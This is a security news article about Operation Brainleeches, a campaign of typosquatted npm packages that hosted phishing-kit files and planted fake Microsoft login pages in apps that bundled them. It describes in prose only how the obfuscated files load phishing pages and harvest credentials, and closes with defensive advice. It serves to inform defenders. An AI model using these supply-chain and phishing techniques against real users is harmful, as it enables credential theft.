• United States



CSO Senior Writer

Malicious campaign uses npm packages to support phishing attacks

News Analysis
Jul 06, 20235 mins
MalwareOpen SourcePhishing

This newly discovered "dual use" campaign enables software supply chain compromise as well as phishing.

Researchers have identified yet another malicious use for JavaScript packages hosted on the npm registry: hosting files required by automated phishing kits or slipping phishing pages into applications that bundle the components. “The discovery may be the first ‘dual use’ campaign in which malicious open-source packages power both commodity phishing attacks and higher-end software supply chain compromises,” researchers from security firm ReversingLabs said in a new report.

In total the researchers identified over a dozen packages that were part of this campaign, dubbed Operation Brainleeches, and were uploaded to the public npm registry between May 11 and June 13 using names that mimicked those of popular packages like jquery, react, and vue.js. The files were downloaded around 1,000 times in total before they were discovered and removed.

Npm-hosted packages supporting phishing toolkits

The first batch of six packages that were uploaded in May during the first stage of the operation contained files that seem to have been used as part of the infrastructure for phishing kits. These files include two called standforusz and react-vuejs and contain the following files: DEMO.txt, jquery.js, jquery.min.js and package.json.

Based on the names alone these files would not attract suspicion because jquery.js and jquery.min.js are widely used files in JavaScript development and part of the jquery library. However, they caught the attention of the ReversingLabs researchers because their scans detected code obfuscation inside, which is unusual for open-source packages.

The same rogue jquery.js file was observed in the wild as a malicious attachment in email phishing attacks. When opened in a browser it fetched the jquery.min.js from a content delivery network called jsDelivr, which then wrote a new html document dynamically. The file then fetched DEMO.txt from the same location and wrote its contents to the new document.

DEMO.txt contains HTML code that mimics the login page for and sends any credentials entered in the form to a remote server. The researchers also found another phishing page targeting Microsoft 365 credentials by displaying what seems to be a blurred document in the background with a small Microsoft login pop-up in front.

Since the same files that were used in these phishing attacks were all found bundled in malicious npm packages, the assumption is that they’re likely part of some phishing kit whose deployment automation relies on npm. “Our open-source research uncovered both remnants of Operation Brainleeches as well as a very large number of similar email phishing attachments spawned by slightly different, but closely related phishing kits,” the ReversingLabs researchers said. “That suggests that the modules identified in phase 1 of the attack were likely not unique but part of a broader wave of attacks orchestrated by low level actors outfitted with powerful and automated tooling.”

Npm packages used to phish users of trojanized applications

The second phase of the attack involved a different set of packages, of which seven were identified, that behaved more in line with the supply-chain attacks seen on npm before. While most supply-chain attacks that rely on malicious npm packages target developers or development organizations that consume those packages in their projects, these packages were geared toward the end users of applications that happened to bundle them.

In essence this was a typosquatting attack as the packages had names like jqueryoffline, vueofflinez and jquerydownloadnew — variations on popular frameworks and libraries. The attackers likely relied on developers accidentally incorporating these packages in their applications and their contents reflect that.

Compared to the packages in phase 1, these new packages also included two files called index.js and index.html, with index.js being declared as the main file in the package.json metadata file. The researchers speculated that the goal in this case was to target JavaScript applications built with tools like Webpack that bundle JavaScript files to create local applications that run inside a browser window.

“For an application developer who is tricked into adding the jqueryoffline npm package as a dependency in lieu of the legitimate jquery package, Webpack will compile the necessary code and ensure that the content of the jqueryoffline index.js file, which is specified as the main inside jqueryoffline package.json file, ends up in the main.js file, which is the entry point of the Webpack bundled application,” the researchers said.

This means that an end user who then downloads and executes an application trojanized in this manner will be prompted with fake Microsoft login pages that send the captured credentials to the attackers. This phase of the attack is similar to a different campaign that ReversingLabs detected last year and dubbed IconBurst where malicious npm packages were designed to steal sensitive information entered by users in forms displayed in mobile applications and websites.

When consuming packages from public repositories software development organizations should be careful for telltale signs that packages might be suspicious: new packages with unusual name variations of well-known frameworks and libraries, low download counts, unusual dependencies, unusual versioning — in other words packages with a sketchy history. The use of code obfuscation inside packages should also be a big red flag.